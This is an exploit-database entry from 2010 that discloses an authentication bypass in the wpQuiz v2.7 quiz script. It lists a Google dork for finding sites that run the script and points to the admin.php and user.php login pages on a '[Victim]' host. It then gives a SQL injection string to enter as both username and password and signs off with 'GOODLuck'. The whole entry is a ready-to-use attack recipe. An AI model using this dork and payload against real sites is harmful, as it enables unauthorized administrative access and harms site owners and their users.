id: 14150
date: 09/22/2010
title: wpQuiz v2.7 Authentication Bypass Vulnerability
author: KnocKout
cves: 

===============================================
wpQuiz v2.7 Authentication Bypass Vulnerability
===============================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[+] Greatz : DaiMon
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Script : wpQuiz
~Version : 2.7
~Download : http://webscripts.softpedia.com/script/Quizz/wpQuiz-41098.html
~Vulnerability Style : Auth bypass
~Google Dork : "Powered by wpQuiz" inurl:index.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~ Explotation ~~~~~~~~~~~
 
http://[Victim]/path/admin.php
                     [or user.php]
 
for bypass() bySQL
 
ID : ' or '1=1
PW : ' or '1=1
 
              GOODLuck ;)
               
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#  0day.today [2023-03-26]  #